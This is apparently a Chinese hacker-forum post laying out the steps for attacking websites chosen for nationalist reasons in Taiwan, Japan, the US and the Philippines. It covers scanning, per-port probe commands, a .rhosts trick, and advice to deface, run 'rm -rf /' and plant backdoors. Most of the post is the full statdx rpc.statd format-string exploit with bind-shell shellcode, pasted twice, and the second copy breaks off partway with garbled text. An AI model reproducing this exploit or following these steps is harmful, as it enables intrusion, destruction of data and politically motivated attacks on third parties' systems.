mf117 
级别:精灵王
威望:0
经验:0
货币:2217
体力:
来源:61.183.67.*
总发帖数:362
注册日期:2002-03-27
|
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
攻击的一般步骤
从来没有写过什么东西,这次就献丑了… 攻击一般来说分为以下几个步骤:
1. 确立目标
2. 扫描.
3. 探测漏洞并且进行分析
4. 找对应的exploit程序.
5. 编译程序,并且运行. 测试是否获得root权限
6. 视情况修改站点主页或者通知webmaster,或者来个rm –rf /进行彻底破坏.
7.
打扫战场,决定是否留后门
8. game ove ,可以去吃饭或者睡觉了(别打我)
下面详细说明:
一. 确立目标.
近段时期老是发生另国人愤慨的一些事情.台湾的台独分子、日本的修改教科书以及这几天的美国无理撞毁我战斗机的事件等等都令广大热血青年愤慨不已.作为红客联盟的一员,我们有必要对这些反华势力站点置以毁灭性的一击.
所以目标缩定:台湾的台独网站,日本的反华势力网站,美国的某些站点(这个就步用我多说了吧).当然还可以加上菲律宾的嚣张势力网站.
二. 扫描.
以前lion以及很多热心的红客联盟网友公布了台湾,日本,以及美国的IP分配表.
1.
如果你想直接扫描,如果是win系统,推荐使用以前联盟公布的superscan程序,扫描速度快..并且能自定义扫描端口以及timed
out值.还可以返回对方端口的响应.如果是unix/linux系统,推荐使用nmap程序.
2.
如果想在肉鸡上扫描,请使用nmap程序.
这里不详细说明如何使用nmap以及superscan的方法.
以扫描210.59.*.*为例.(为防泄露,隐去改IP.)调用superscan,填入IP,选好要扫描的端口范围,然后开始.扫描结果如下:
* + 210.59.*.*
___ 21 File Transfer Protocol
[Control]
___ 22 SSH Remote Login Protocol
___
SSH-1.99-OpenSSH_2.1.1.
___ 23 Telnet
___ .....
..#..'
___ 25 Simple Mail Transfer
___ 220
ep1.eparty.com.tw ESMTP Sendmail 8.11.0/8.11.0; Thu, 11 Jan 2001
13:32:10 +0800..
___ 53 Domain Name Server
___
79 Finger
___ 80 World Wide Web HTTP
___
HTTP/1.1 200 OK..Date: Thu, 11 Jan 2001 05:32:08 GMT..Server:
Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSSL/0.9.5
___ 111 SUN Remote Procedure Call
___ 443 https
___ 513 Remote login
___ 514 cmd
___
1024 Motorola Cable Modem Telnet
___ 3306 mysql
___ G....j.Host '210.43.195.200' is not allowed to connect
to this MySQL server
三. 探测漏洞并且分析.
通过扫描的结果可以得知对方主机开了以上几个端口.
Ⅰ.关于21端口,可能存在的漏洞是ftpd的漏洞,如果允许匿名用户(anonymous)登陆,而且存在可写的目录.
在linux主机上最常用的ftpd是wu_ftpd.并且通常是2.6.0版本.在www.hack.co.za上面早就公布了该漏洞的exploit程序.如果对方ftpd恰好是2.6.0或者以下,允许匿名登陆,并且存在可写目录,那么这台机器就是你的了J.而由此推断,如果你拥有改主机的任何一个可以ftp的用户名和密码,那么这台主机同样可以被攻击.
Ⅱ.关于22端口.这是ssh端口.理论上任何小于2.2.0版本的sshd都可以被攻击..不过我现在还没有测试过.J
Ⅲ.关于23端口.我们可以从这里取得一些基本信息…有很多站点缺省的/etc/issue.net没有修改,当我们telnet上去后就可以得到对方的主机名以及系统版本.当然,对于没有打补丁的IRIX
unix,我们可以直接利用telnetd的漏洞进行攻击,得到root权限.
Ⅳ.25端口.sendmail端口.8.9的版本都只能进行dos攻击.而freebsd的8.8.3版本可以远程溢出获得shell.一般我们直接telnet
上25端口,然后使用VRFY命令来校验该主机用户.比如:VRFY bkbll.
Ⅴ.53端口.就是DNS端口了..这里当前存在最大的隐患就是bind攻击.对于bind8.2的DNS服务器我们可以利用lion
worm来远程获得root shell.探测对方bind版本命令: dig @IP txt chaos version.bind.
Ⅵ.79端口.finger端口.老问题.可以探测当前登陆的用户名.方法:finger @IP.
Ⅶ.80端口.在linux和unix系统下面好象作用不大,在NT下就主要靠它了J.不过许多CGI程序设置不当,没有处理那些边界条件,造成溢出可以浏览硬盘上的文件.ps.可以telnet
IP 80,GET得到对方服务器的类型.
Ⅷ.
111端口.当前最流行的攻击.可以远程得到root的shell.可以利用rpcinfo –p
IP得到对方开放的r系列服务.linux存在stad漏洞,sun存在cmsd漏洞.
Ⅸ.443端口.没有利用过.
Ⅹ.513端口.rlogin的端口.如果你向服务器发送一条echo
“++”>/.rhost命令并且成功执行的话,那么当你rlogin IP的时候就不用输入密码.
Ⅺ.514端口.远程执行命令.好象没有什么漏洞.
Ⅻ.1024没有用过.
ⅩⅢ.3306端口.mysql.www.hack.co.za上面公布了几个exploit四. 找exploit程序.
上面介绍了这么多的漏洞,似乎root权限唾手可得…其实不然.有时候明明存在的漏洞,当你编译好程序攻击的时候,需要猜测n多次的offset值.这里给出一个常用的程序for
linux statd的。
/**
*** $ gcc -o statdx statdx.c ;
./statdx -h
*** buffer -> This is the address you'll
need (-a and -l options)
*** str -> Process-supplied
string; 24 bytes long
*** 4 -> Duplicate dwords to
satisfy the %!d specifiers and
*** the double %n when two
successive values are equal
*** r -> Stack position of
saved eip
*** %8x.. -> Wipes the va_list dword and str;
9 by default (-w option)
*** %!x -> Used for padding to
form an aggregate overwrite value;
*** the exclamation
mark denotes a field width. This may
*** or may not be
present, depending on the value. An
*** algorithm is used
to allow tricky values.
*** %n -> Writes overwrite
value to the corresponding address
*** sc -> Nops +
portbinding shellcode (port 39168)
***
*** Only
modify the default wipe value and the default offset value if you
*** know what you're doing.
***
*** An
easy way to get the buffer address for simulation systems that you
*** have privileged access to:
***
***
[term 1]# ltrace -p ****pidof rpc.statd**** -o foo
***
[term 2]$ ./statdx -a 0x41414141 localhost
*** [term 1]#
grep vsnprintf foo head -1 sed 's/.*(//' \
*** awk -F","
'{print $1}'
***
*** (Of course, ensure that
rpc.statd is started at boot time and not from
*** an
interactive shell, otherwise it will inherit a larger environment
*** and blow the accuracy of your findings.)
***
*** Ok, longwinded enough. Let's dance.
***
*** greets
*** ------
*** ADM,
attrition, rogues, security.is, teso
***
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SM_PROG
100024
#define SM_VERS 1
#define SM_STAT 1
#define SM_MAXSTRLEN 1024
#define max(a,b)
((a)>(b)?(a)b))
#define NOP 0x90
char
shellcode[] =
"\x31\xc0" /* xorl %eax,%eax */
/*
jmp ricochet -------------------------------------------------------
*/
"\xeb\x7c" /* jmp 0x7c */
/* kungfu:
------------------------------------------------------------ */
"\x59" /* popl %ecx */
"\x89\x41\x10" /* movl
%eax,0x10(%ecx) */
/* ------------------------------------
socket(2,1,0); ---------------- */
"\x89\x41\x08" /* movl
%eax,0x8(%ecx) */
"\xfe\xc0" /* incb %al */
"\x89\x41\x04" /* movl %eax,0x4(%ecx) */
"\x89\xc3" /* movl %eax,%ebx */
"\xfe\xc0" /*
incb %al */
"\x89\x01" /* movl %eax,(%ecx) */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /*
int $0x80 */
/* ------------------------------------
bind(sd,&sockaddr,16); -------- */
"\xb3\x02" /* movb
$0x2,%bl */
"\x89\x59\x0c" /* movl %ebx,0xc(%ecx) */
"\xc6\x41\x0e\x99" /* movb $0x99,0xe(%ecx) */
"\xc6\x41\x08\x10" /* movb $0x10,0x8(%ecx) */
"\x89\x49\x04" /* movl %ecx,0x4(%ecx) */
"\x80\x41\x04\x0c" /* addb $0xc,0x4(%ecx) */
"\x88\x01" /* movb %al,(%ecx) */
"\xb0\x66" /*
movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ listen(sd,blah); --------------
*/
"\xb3\x04" /* movb $0x4,%bl */
"\xb0\x66" /*
movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ accept(sd,0,16); --------------
*/
"\xb3\x05" /* movb $0x5,%bl */
"\x30\xc0" /*
xorb %al,%al */
"\x88\x41\x04" /* movb %al,0x4(%ecx) */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /*
int $0x80 */
/* ------------------------------------
dup2(cd,0); ------------------- */
"\x89\xce" /* movl
%ecx,%esi */
"\x88\xc3" /* movb %al,%bl */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb0\x3f" /*
movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,1); -------------------
*/
"\xfe\xc1" /* incb %cl */
"\xb0\x3f" /* movb
$0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,2); -------------------
*/
"\xfe\xc1" /* incb %cl */
"\xb0\x3f" /* movb
$0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ execve("/bin/sh",argv,0); -----
*/
"\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f,(%esi)
*/
"\xc7\x46\x04\x2f\x73\x68\x41" /* movl
$0x4168732f,0x4(%esi) */
"\x30\xc0" /* xorb %al,%al */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x76\x0c" /* movl %esi,0xc(%esi) */
"\x8d\x56\x10" /* leal 0x10(%esi),%edx */
"\x8d\x4e\x0c" /* leal 0xc(%esi),%ecx */
"\x89\xf3" /* movl %esi,%ebx */
"\xb0\x0b" /*
movb $0xb,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ exit(blah); -------------------
*/
"\xb0\x01" /* movb $0x1,%al */
"\xcd\x80" /*
int $0x80 */
/* ricochet: call kungfu
---------------------------------------------- */
"\xe8\x7f\xff\xff\xff"; /* call -0x81 */
enum
res
{ stat_succ,
stat_fail
};
struct sm_name
{ char *mon_name;
};
struct sm_stat_res
{ enum res res_stat;
int state;
};
struct type
{
int type;
char *desc;
char *code;
u_long bufpos;
int buflen;
int offset;
int wipe;
};
struct type types[] =
{ {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode,
0xbffff314, 1024, 600, 9},
{1, "Redhat 6.1
(knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
{2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314,
1024, 600, 9},
{0, NULL, NULL, 0, 0, 0, 0}
};
bool_t
xdr_sm_name(XDR *xdrs, struct sm_name
*objp)
{ if (!xdr_string(xdrs, &objp->mon_name,
SM_MAXSTRLEN))
return (FALSE);
return (TRUE);
}
bool_t
xdr_res(XDR *xdrs, enum res
*objp)
{ if (!xdr_enum(xdrs, (enum_t *)objp))
return (FALSE);
return (TRUE);
}
bool_t
xdr_sm_stat_res(XDR *xdrs, struct
sm_stat_res *objp)
{ if (!xdr_res(xdrs,
&objp->res_stat))
return (FALSE);
if
(!xdr_int(xdrs, &objp->state))
return (FALSE);
return (TRUE);
}
void
usage(char *app)
{
int i;
fprintf(stderr, "statdx by ron1n \n");
fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l
len]\n", app);
fprintf(stderr, "\t[-o offset] [-w num] [-s
secs] [-d type] \n");
fprintf(stderr, "-t\tattack a tcp
dispatcher [udp]\n");
fprintf(stderr, "-p\trpc.statd
serves requests on [query]\n");
fprintf(stderr, "-a\tthe
stack address of the buffer is \n");
fprintf(stderr,
"-l\tthe length of the buffer is [1024]\n");
fprintf(stderr, "-o\tthe offset to return to is [600]\n");
fprintf(stderr, "-w\tthe number of dwords to wipe is
[9]\n");
fprintf(stderr, "-s\tset timeout in seconds to
[5]\n");
fprintf(stderr, "-d\tuse a hardcoded \n");
fprintf(stderr, "Available types:\n");
for(i =
0; types[i].desc; i++)
fprintf(stderr, "%d\t%s\n",
types[i].type, types[i].desc);
exit(EXIT_FAILURE);
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "cd /; ls -alF; id;\n", 19, 0);
for(;
{ FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd,
&fds);
if(select(fmax, &fds, NULL, NULL, NULL)
< 0)
{ perror("select()");
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{ bzero(buff,
sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0))
< 0)
{ perror("recv()");
exit(EXIT_FAILURE);
}
if(!ret)
{ fprintf(stderr,
"Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret =
read(fileno(stdin), buff, sizeof buff);
errno = 0;
if(send(sockd, buff, ret, 0) != ret)
{
if(errno) perror("send()");
else fprintf(stderr,
"Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
void
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(39168);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))
< 0)
{
perror("socket()");
exit(EXIT_FAILURE);
}
if(!connect(sockd, (struct sockaddr *) &host, sizeof
host))
{
printf("OMG! You now have rpc.statd
technique!@#$!\n");
runshell(sockd);
}
close(sockd);
}
char *
wizardry(char *sc, u_long bufpos, int buflen, int offset,
int wipe)
{
int i, j, cnt, pad;
char
pbyte, *buff, *ptr;
u_long retpos;
u_long
dstpos;
while(bufpos % 4) bufpos--;
/* buflen +
ebp */
retpos = bufpos + buflen + 4;
/*
** 0x00 == '\0'
** 0x25 == '%'
** (add
troublesome bytes)
** Alignment requirements aid
comparisons
*/
pbyte = retpos & 0xff;
/* Yes, it's 0x24 */
if(pbyte == 0x00 pbyte ==
0x24)
{
fprintf(stderr, "Target address space
contains a poison char\n");
exit(EXIT_FAILURE);
}
/*
** Unless the user gives us a
psychotic value,
** the address should now be clean.
*/
/* str */
cnt = 24;
/* 1
= process nul */
buflen -= cnt + 1;
if(!(buff =
malloc(buflen + 1)))
{
perror("malloc()");
exit(EXIT_FAILURE);
}
ptr = buff;
memset(ptr, NOP, buflen);
for(i = 0; i < 4;
i++, retpos++)
{
/* junk dword */
for(j = 0; j < 4; j++)
*ptr++ = retpos
>> j * 8 & 0xff;
/* r + i */
memcpy(ptr, ptr - 4, 4);
ptr += 4; cnt += 8;
}
/* restore */
retpos -= 4;
for(i = 0; i < wipe; i++)
{
/*
consistent calculations */
strncpy(ptr, "%8x", 3);
ptr += 3; cnt += 8;
}
dstpos = bufpos
+ offset;
/*
** This small algorithm of mine can
be used
** to obtain "difficult" values..
*/
for(i = 0; i < 4; i++)
{
pad =
dstpos >> i * 8 & 0xff;
if(pad == (cnt &
0xff))
{
sprintf(ptr, "%%n%%n");
ptr
+= 4; continue;
}
else
{
int
tmp;
/* 0xffffffff = display count of 8 */
while(pad < cnt pad % cnt <= 8) pad += 0x100;
pad -= cnt, cnt += pad;
/* the source of this
evil */
tmp = sprintf(ptr, "%%%dx%%n", pad);
ptr
+= tmp;
}
}
*ptr = NOP;
/*
plug in the shellcode */
memcpy(buff + buflen -
strlen(sc), sc, strlen(sc));
buff[buflen] = '\0';
printf("buffer: %#lx length: %d (+str/+nul)\n", bufpos,
strlen(buff));
printf("target: %#lx new: %#lx (offset:
%d)\n", retpos, dstpos, offset);
printf("wiping %d
dwords\n", wipe);
return buff;
}
struct in_addr
getip(char *host)
{
struct hostent *hs;
if((hs =
gethostbyname(host)) == NULL)
{
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
return *((struct in_addr *) hs->h_addr);
}
int
main(int argc, char **argv)
{
int ch;
char *buff;
CLIENT
*clnt;
enum clnt_stat res;
struct timeval tv,
tvr;
struct sm_name smname;
struct sm_stat_res
smres;
struct sockaddr_in addr;
int type = -1;
int usetcp = 0;
int timeout = 5;
int
wipe = 9;
int offset = 600;
int buflen = 1024;
char *target;
char *sc = shellcode;
u_short port = 0;
u_long bufpos = 0;
int sockp = RPC_ANYSOCK;
extern char *optarg;
extern int optind;
extern int opterr;
opterr = 0;
while((ch = getopt(argc, argv,
"tp:a:l:w  :")) != -1)
{
switch(ch)
{
case 't': usetcp = 1;
break;
case 'p': sscanf(optarg, "%hu", &port); break;
case 'a': sscanf(optarg, "%lx", &bufpos); break;
case 'l': buflen = atoi(optarg); break;
case
'o': offset = atoi(optarg); break;
case 's': timeout =
atoi(optarg); break;
case 'w': wipe = atoi(optarg); break;
case 'd': type = atoi(optarg); break;
default :
usage(argv[0]);
}
}
if(!(target =
argv[optind]))
{
fprintf(stderr, "No target host
specified\n");
exit(EXIT_FAILURE);
}
if(type >= 0)
{
if(type >=
sizeof types / sizeof types[0] - 1)
{
fprintf(stderr, "Invalid type\n");
exit(EXIT_FAILURE);
}
sc =
types[type].code;
bufpos = types[type].bufpos;
buflen = types[type].buflen;
offset =
types[type].offset;
wipe = types[type].wipe;
}
if(!bufpos)
{
fprintf(stderr, "No
buffer address specified\n");
exit(EXIT_FAILURE);
}
bzero(&addr, sizeof addr);
addr.sin_family = AF_INET;
addr.sin_port =
htons(port);
addr.sin_addr = getip(target);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if(!usetcp)
{
clnt =
clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
if(clnt == NULL)
{
clnt_pcreateerror("clntudp_create()");
exit(EXIT_FAILURE);
}
tvr.tv_sec = 2;
tvr.tv_usec = 0;
clnt_control(clnt,
CLSET_RETRY_TIMEOUT, (char *) &tvr);
}
else
{
clnt = clnttcp_create(&addr, SM_PROG,
SM_VERS, &sockp, 0, 0);
if(clnt == NULL)
{
clnt_pcreateerror("clnttcp_create()");
exit(EXIT_FAILURE);
}
}
/*
AUTH_UNIX / AUTH_SYS authentication forgery */
clnt->cl_auth = authunix_create("localhost", 0, 0, 0,
NULL);
buff = wizardry(sc, bufpos, buflen, offset, wipe);
smname.mon_name = buff;
res = clnt_call(clnt,
SM_STAT, (xdrproc_t) xdr_sm_name,
(caddr_t) &smname,
(xdrproc_t) xdr_sm_stat_res,
(caddr_t) &smres, tv);
if(res != RPC_SUCCESS)
{
clnt_perror(clnt, "clnt_call()");
printf("A
timeout was expected. Attempting connection to shell..\n");
sleep(5); connection(addr);
printf("Failed\n");
}
else
{
printf("Failed -
statd returned res_stat: (%s) state: %d\n",
smres.res_stat
? "failure" : "success", smres.state);
}
free(buff);
clnt_destroy(clnt);
return
-1;
}
/* www.hack.co.za [7 August 2000]*/
,不过我没有试过
四. 找exploit程序.
上面介绍了这么多的漏洞,似乎root权限唾手可得…其实不然.有时候明明存在的漏洞,当你编译好程序攻击的时候,需要猜测n多次的offset值.这里给出一个常用的程序for
linux statd的。
/**
*** $ gcc -o statdx statdx.c ;
./statdx -h
*** buffer -> This is the address you'll
need (-a and -l options)
*** str -> Process-supplied
string; 24 bytes long
*** 4 -> Duplicate dwords to
satisfy the %!d specifiers and
*** the double %n when two
successive values are equal
*** r -> Stack position of
saved eip
*** %8x.. -> Wipes the va_list dword and str;
9 by default (-w option)
*** %!x -> Used for padding to
form an aggregate overwrite value;
*** the exclamation
mark denotes a field width. This may
*** or may not be
present, depending on the value. An
*** algorithm is used
to allow tricky values.
*** %n -> Writes overwrite
value to the corresponding address
*** sc -> Nops +
portbinding shellcode (port 39168)
***
*** Only
modify the default wipe value and the default offset value if you
*** know what you're doing.
***
*** An
easy way to get the buffer address for simulation systems that you
*** have privileged access to:
***
***
[term 1]# ltrace -p ****pidof rpc.statd**** -o foo
***
[term 2]$ ./statdx -a 0x41414141 localhost
*** [term 1]#
grep vsnprintf foo head -1 sed 's/.*(//' \
*** awk -F","
'{print $1}'
***
*** (Of course, ensure that
rpc.statd is started at boot time and not from
*** an
interactive shell, otherwise it will inherit a larger environment
*** and blow the accuracy of your findings.)
***
*** Ok, longwinded enough. Let's dance.
***
*** greets
*** ------
*** ADM,
attrition, rogues, security.is, teso
***
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SM_PROG
100024
#define SM_VERS 1
#define SM_STAT 1
#define SM_MAXSTRLEN 1024
#define max(a,b)
((a)>(b)?(a)b))
#define NOP 0x90
char
shellcode[] =
"\x31\xc0" /* xorl %eax,%eax */
/*
jmp ricochet -------------------------------------------------------
*/
"\xeb\x7c" /* jmp 0x7c */
/* kungfu:
------------------------------------------------------------ */
"\x59" /* popl %ecx */
"\x89\x41\x10" /* movl
%eax,0x10(%ecx) */
/* ------------------------------------
socket(2,1,0); ---------------- */
"\x89\x41\x08" /* movl
%eax,0x8(%ecx) */
"\xfe\xc0" /* incb %al */
"\x89\x41\x04" /* movl %eax,0x4(%ecx) */
"\x89\xc3" /* movl %eax,%ebx */
"\xfe\xc0" /*
incb %al */
"\x89\x01" /* movl %eax,(%ecx) */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /*
int $0x80 */
/* ------------------------------------
bind(sd,&sockaddr,16); -------- */
"\xb3\x02" /* movb
$0x2,%bl */
"\x89\x59\x0c" /* movl %ebx,0xc(%ecx) */
"\xc6\x41\x0e\x99" /* movb $0x99,0xe(%ecx) */
"\xc6\x41\x08\x10" /* movb $0x10,0x8(%ecx) */
"\x89\x49\x04" /* movl %ecx,0x4(%ecx) */
"\x80\x41\x04\x0c" /* addb $0xc,0x4(%ecx) */
"\x88\x01" /* movb %al,(%ecx) */
"\xb0\x66" /*
movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ listen(sd,blah); --------------
*/
"\xb3\x04" /* movb $0x4,%bl */
"\xb0\x66" /*
movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ accept(sd,0,16); --------------
*/
"\xb3\x05" /* movb $0x5,%bl */
"\x30\xc0" /*
xorb %al,%al */
"\x88\x41\x04" /* movb %al,0x4(%ecx) */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /*
int $0x80 */
/* ------------------------------------
dup2(cd,0); ------------------- */
"\x89\xce" /* movl
%ecx,%esi */
"\x88\xc3" /* movb %al,%bl */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb0\x3f" /*
movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,1); -------------------
*/
"\xfe\xc1" /* incb %cl */
"\xb0\x3f" /* movb
$0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ dup2(cd,2); -------------------
*/
"\xfe\xc1" /* incb %cl */
"\xb0\x3f" /* movb
$0x3f,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ execve("/bin/sh",argv,0); -----
*/
"\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f,(%esi)
*/
"\xc7\x46\x04\x2f\x73\x68\x41" /* movl
$0x4168732f,0x4(%esi) */
"\x30\xc0" /* xorb %al,%al */
"\x88\x46\x07" /* movb %al,0x7(%esi) */
"\x89\x76\x0c" /* movl %esi,0xc(%esi) */
"\x8d\x56\x10" /* leal 0x10(%esi),%edx */
"\x8d\x4e\x0c" /* leal 0xc(%esi),%ecx */
"\x89\xf3" /* movl %esi,%ebx */
"\xb0\x0b" /*
movb $0xb,%al */
"\xcd\x80" /* int $0x80 */
/*
------------------------------------ exit(blah); -------------------
*/
"\xb0\x01" /* movb $0x1,%al */
"\xcd\x80" /*
int $0x80 */
/* ricochet: call kungfu
---------------------------------------------- */
"\xe8\x7f\xff\xff\xff"; /* call -0x81 */
enum
res
{ stat_succ,
stat_fail
};
struct sm_name
{ char *mon_name;
};
struct sm_stat_res
{ enum res res_stat;
int state;
};
struct type
{
int type;
char *desc;
char *code;
u_long bufpos;
int buflen;
int offset;
int wipe;
};
struct type types[] =
{ {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode,
0xbffff314, 1024, 600, 9},
{1, "Redhat 6.1
(knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
{2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314,
1024, 600, 9},
{0, NULL, NULL, 0, 0, 0, 0}
};
bool_t
xdr_sm_name(XDR *xdrs, struct sm_name
*objp)
{ if (!xdr_string(xdrs, &objp->mon_name,
SM_MAXSTRLEN))
return (FALSE);
return (TRUE);
}
bool_t
xdr_res(XDR *xdrs, enum res
*objp)
{ if (!xdr_enum(xdrs, (enum_t *)objp))
return (FALSE);
return (TRUE);
}
bool_t
xdr_sm_stat_res(XDR *xdrs, struct
sm_stat_res *objp)
{ if (!xdr_res(xdrs,
&objp->res_stat))
return (FALSE);
if
(!xdr_int(xdrs, &objp->state))
return (FALSE);
return (TRUE);
}
void
usage(char *app)
{
int i;
fprintf(stderr, "statdx by ron1n \n");
fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l
len]\n", app);
fprintf(stderr, "\t[-o offset] [-w num] [-s
secs] [-d type] \n");
fprintf(stderr, "-t\tattack a tcp
dispatcher [udp]\n");
fprintf(stderr, "-p\trpc.statd
serves requests on [query]\n");
fprintf(stderr, "-a\tthe
stack address of the buffer is \n");
fprintf(stderr,
"-l\tthe length of the buffer is [1024]\n");
fprintf(stderr, "-o\tthe offset to return to is [600]\n");
fprintf(stderr, "-w\tthe number of dwords to wipe is
[9]\n");
fprintf(stderr, "-s\tset timeout in seconds to
[5]\n");
fprintf(stderr, "-d\tuse a hardcoded \n");
fprintf(stderr, "Available types:\n");
for(i =
0; types[i].desc; i++)
fprintf(stderr, "%d\t%s\n",
types[i].type, types[i].desc);
exit(EXIT_FAILURE);
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "cd /; ls -alF; id;\n", 19, 0);
for(;
{ FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd,
&fds);
if(select(fmax, &fds, NULL, NULL, NULL)
< 0)
{ perror("select()");
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{ bzero(buff,
sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0))
< 0)
{ perror("recv()");
exit(EXIT_FAILURE);
}
if(!ret)
{ fprintf(stderr,
"Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret =
read(fileno(stdin), buff, sizeof buff);
errno = 0;
if(send(sockd, buff, ret, 0) != ret)
{
if(errno) perror("send()");
else fprintf(stderr,
"Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
}
void
connection(struct sockaddr_in host)
{
int sockd;
host.sin_port = htons(39168);
if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))
< 0)
{
perror("socket()");
exit(EXIT_FAILURE);
}
if(!connect(sockd, (struct sockaddr *) &host, sizeof
host))
{
printf("OMG! You now have rpc.statd
technique!@#$!\n");
runshell(sockd);
}
close(sockd);
}
char *
wizardry(char *sc, u_long bufpos, int buflen, int offset,
int wipe)
{
int i, j, cnt, pad;
char
pbyte, *buff, *ptr;
u_long retpos;
u_long
dstpos;
while(bufpos % 4) bufpos--;
/* buflen +
ebp */
retpos = bufpos + buflen + 4;
/*
** 0x00 == '\0'
** 0x25 == '%'
** (add
troublesome bytes)
** Alignment requirements aid
comparisons
*/
pbyte = retpos & 0xff;
/* Yes, it's 0x24 */
if(pbyte == 0x00 pbyte ==
0x24)
{
fprintf(stderr, "Target address space
contains a poison char\n");
exit(EXIT_FAILURE);
}
/*
** Unless the user gives us a
psychotic value,
** the address should now be clean.
*/
/* str */
cnt = 24;
/* 1
= process nul */
buflen -= cnt + 1;
if(!(buff =
malloc(buflen + 1)))
{
perror("malloc()");
exit(EXIT_FAILURE);
}
ptr = buff;
memset(ptr, NOP, buflen);
for(i = 0; i < 4;
i++, retpos++)
{
/* junk dword */
for(j = 0; j < 4; j++)
*ptr++ = retpos
>> j * 8 & 0xff;
/* r + i */
memcpy(ptr, ptr - 4, 4);
ptr += 4; cnt += 8;
}
/* restore */
retpos -= 4;
for(i = 0; i < wipe; i++)
{
/*
consistent calculations */
strncpy(ptr, "%8x", 3);
ptr += 3; cnt += 8;
}
dstpos = bufpos
+ offset;
/*
** This small algorithm of mine can
be used
** to obtain "difficult" values..
*/
for(i = 0; i < 4; i++)
{
pad =
dstpos >> i * 8 & 0xff;
if(pad == (cnt &
0xff))
{
sprintf(ptr, "%%n%%n");
ptr
+= 4; continue;
}
else
{
int
tmp;
/* 0xffffffff = display count of 8 */
while(pad < cnt pad % cnt <= 8) pad += 0x100;
pad -= cnt, cnt += pad;
/* the source of this
evil */
tmp = sprintf(ptr, "%%%dx%%n", pad);
ptr
+= tmp;
}
}
*ptr = NOP;
/*
plug in the shellcode */
memcpy(buff + buflen -
strlen(sc), sc, strlen(sc));
buff[buflen] = '\0';
printf("buffer: %#lx length: %d (+str/+nul)\n", bufpos,
strlen(buff));
printf("target: %#lx new: %#lx (offset:
%d)\n", retpos, dstpos, offset);
printf("wiping %d
dwords\n", wipe);
return buff;
}
struct in_addr
getip(char *host)
{
struct hostent *hs;
if((hs =
gethostbyname(host)) == NULL)
{
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
return *((struct in_addr *) hs->h_addr);
}
int
main(int argc, char **argv)
{
int ch;
char *buff;
CLIENT
*clnt;
enum clnt_stat res;
struct timeval tv,
tvr;
struct sm_name smname;
struct sm_stat_res
smres;
struct sockaddr_in addr;
int type = -1;
int usetcp = 0;
int timeout = 5;
int
wipe = 9;
int offset = 600;
int buflen = 1024;
char *target;
char *sc = shellcode;
u_short port = 0;
u_long bufpos = 0;
int sockp = RPC_ANYSOCK;
extern char *optarg;
extern int optind;
extern int opterr;
opterr = 0;
while((ch = getopt(argc, argv,
"tp:a:l:w:")) != -1)
{
switch(ch)
{
case 't': usetcp = 1;
break;
case 'p': sscanf(optarg, "%hu", &port); break;
case 'a': sscanf(optarg, "%lx", &bufpos); break;
case 'l': buflen = atoi(optarg); break;
case
'o': offset = atoi(optarg); break;
case 's': timeout =
atoi(optarg); break;
case 'w': wipe = atoi(optarg); break;
